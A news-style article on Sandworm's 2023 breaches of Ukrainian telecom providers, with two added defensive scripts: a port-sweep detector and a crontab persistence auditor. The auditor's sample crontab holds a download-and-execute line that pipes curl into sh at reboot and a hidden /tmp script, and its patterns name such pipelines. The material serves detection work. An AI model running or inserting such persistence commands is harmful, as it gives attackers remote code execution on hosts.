Behind the Breach: Sandworm’s Exploitation of Ukrainian Telecom Vulnerabilities
The state-sponsored Russian hacking group Sandworm compromised 11 Ukrainian telecommunication providers between May and September 2023. The Ukrainian Computer Emergency Response Team (CERT-UA) reported the breaches, noting service interruptions and potential exposure of data.
Sandworm, linked to Russia’s GRU military intelligence service, used tactics such as phishing, Android malware, and data wipers throughout 2023. The intrusions began with network reconnaissance using the ‘masscan’ tool, with Sandworm looking for open ports and unprotected RDP or SSH interfaces. Other tools, including ‘ffuf’, ‘dirbuster’, ‘gowitness’, and ‘nmap’, were used to identify vulnerabilities in web services. The hackers then exploited VPN accounts that lacked multi-factor authentication and routed their traffic through proxy servers such as ‘Dante’ and ‘socks5’ to conceal their activity.
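The reconnaissance phase described above leaves a recognisable footprint in perimeter logs: one source address touching many distinct host:port pairs within seconds. The following detection script is an added example, not part of the CERT-UA report or this article; it parses a constructed, simplified firewall log format (timestamp, action, src, dst, dport), flags sources whose distinct targets in any 60-second window exceed a threshold, and separately lists accepted external connections to the RDP and SSH ports the article says were targeted. The regex and sample lines are assumptions and would need adapting to a real firewall export.

```python
"""Flag masscan-style port sweeps and exposed admin services in firewall logs.

Added example (not from the article). The log format is constructed:
<ISO timestamp> <ACCEPT|DROP> src=<ip> dst=<ip> dport=<port>
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ACCEPT|DROP) src=(?P<src>[\d.]+) "
    r"dst=(?P<dst>[\d.]+) dport=(?P<dport>\d+)$"
)

# Constructed sample: one source sweeping several hosts/ports, one normal client.
SAMPLE_LOG = """\
2023-06-01T10:00:00 DROP src=198.51.100.7 dst=192.0.2.10 dport=22
2023-06-01T10:00:00 DROP src=198.51.100.7 dst=192.0.2.10 dport=3389
2023-06-01T10:00:01 DROP src=198.51.100.7 dst=192.0.2.11 dport=443
2023-06-01T10:00:01 DROP src=198.51.100.7 dst=192.0.2.11 dport=8080
2023-06-01T10:00:02 DROP src=198.51.100.7 dst=192.0.2.12 dport=8443
2023-06-01T10:00:02 ACCEPT src=198.51.100.7 dst=192.0.2.12 dport=22
2023-06-01T10:00:05 ACCEPT src=203.0.113.5 dst=192.0.2.10 dport=443
2023-06-01T10:00:06 ACCEPT src=203.0.113.5 dst=192.0.2.10 dport=443
"""


def parse(lines):
    """Yield (timestamp, src, dst, dport, action) for each well-formed line."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            d = m.groupdict()
            yield (datetime.fromisoformat(d["ts"]), d["src"], d["dst"],
                   int(d["dport"]), d["action"])


def find_sweeps(lines, window=timedelta(seconds=60), min_targets=5):
    """Return {src: set of (dst, dport)} for sources that touched at least
    `min_targets` distinct host:port pairs inside some `window`-long span.
    Accepted and dropped packets both count: a sweep is about breadth."""
    events = sorted(parse(lines), key=lambda e: e[0])
    by_src = defaultdict(list)
    for ts, src, dst, dport, _ in events:
        by_src[src].append((ts, (dst, dport)))

    flagged = {}
    for src, evs in by_src.items():
        best, start = set(), 0
        for end in range(len(evs)):
            # Slide the window start forward until it fits within `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            targets = {t for _, t in evs[start:end + 1]}
            if len(targets) > len(best):
                best = targets
        if len(best) >= min_targets:
            flagged[src] = best
    return flagged


def exposed_admin_services(lines, admin_ports=(22, 3389)):
    """Accepted connections to SSH/RDP ports: services worth reviewing for
    exposure, MFA and allow-listing."""
    return sorted({(dst, dport) for _, _, dst, dport, action in parse(lines)
                   if action == "ACCEPT" and dport in admin_ports})


if __name__ == "__main__":
    for src, targets in find_sweeps(SAMPLE_LOG.splitlines()).items():
        print(f"sweep from {src}: {len(targets)} distinct targets")
    print("accepted admin-port connections:",
          exposed_admin_services(SAMPLE_LOG.splitlines()))
```

The threshold and window are tuning knobs: a lower `min_targets` catches slower, more careful scans at the cost of more false positives from legitimate monitoring hosts, which are best handled by an allow-list of known scanners rather than by raising the threshold.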
Two backdoors, ‘Poemgate’ and ‘Poseidon’, were identified on the breached systems. While ‘Poemgate’ captures administrator credentials, ‘Poseidon’ offers extensive remote-control capabilities and maintains persistence by modifying cron entries.
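Because cron is the persistence mechanism named here, a host-level check that audits crontab content for the usual persistence indicators is a practical first response. The script below is an added example and is not tied to Poseidon’s real implementation, which the article does not describe; the crontab text and the indicator weights are constructed assumptions. It parses standard crontab syntax (including `@reboot`-style schedules and `VAR=value` lines), scores each entry against indicators such as executables in world-writable directories, hidden paths, download-and-execute pipelines and base64 decoding, and reports entries above a threshold.

```python
"""Audit crontab text for persistence indicators.

Added example (not from the article, not Poseidon's actual behaviour).
Sample crontab and indicator weights are constructed for illustration.
"""
import re

# Schedule is either an @keyword or five whitespace-separated fields.
CRON_LINE = re.compile(r"^(?P<sched>@\w+|(?:\S+\s+){5})(?P<cmd>.+)$")

# (name, weight, regex, applies-to) — weights are assumed, tune to your fleet.
INDICATORS = [
    ("tmp-path", 2, re.compile(r"(?:^|[\s=;|&])(?:/tmp|/dev/shm|/var/tmp)/"), "cmd"),
    ("hidden-path", 1, re.compile(r"/\.[^/\s]+"), "cmd"),
    ("download-exec", 3, re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b"), "cmd"),
    ("base64-decode", 2, re.compile(r"base64\s+(?:-d|--decode)"), "cmd"),
    ("every-minute", 1, re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*$"), "sched"),
]

# Constructed sample: three benign entries, two that should be flagged.
SAMPLE_CRONTAB = """\
MAILTO=root
# nightly backup
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * /usr/bin/certbot renew
* * * * * /usr/lib/monitor/heartbeat
* * * * * /bin/sh /tmp/.cache/.x.sh
@reboot curl -s http://203.0.113.9/p | sh
"""


def parse_crontab(text):
    """Return [(schedule, command)] skipping blanks, comments and VAR=value lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = CRON_LINE.match(line)
        if m:
            entries.append((m.group("sched").strip(), m.group("cmd").strip()))
    return entries


def audit(text, threshold=2):
    """Score every entry; return dicts for those at or above `threshold`.
    Frequency alone (every-minute) never reaches the threshold, so a busy but
    legitimate job is not flagged without a second indicator."""
    findings = []
    for sched, cmd in parse_crontab(text):
        hits, score = [], 0
        for name, weight, rx, field in INDICATORS:
            if rx.search(sched if field == "sched" else cmd):
                hits.append(name)
                score += weight
        if score >= threshold:
            findings.append({"sched": sched, "cmd": cmd, "score": score, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_CRONTAB):
        print(f"[score {f['score']}] {f['sched']} {f['cmd']}  <- {', '.join(f['hits'])}")
```

On a real host the input would be `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/`, and a clean baseline of expected entries should be diffed against the audit output so that known jobs are not reported on every run.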
Sandworm used the ‘Whitecat’ tool to remove evidence of its activity and deployed scripts to disrupt services, in particular targeting MikroTik equipment.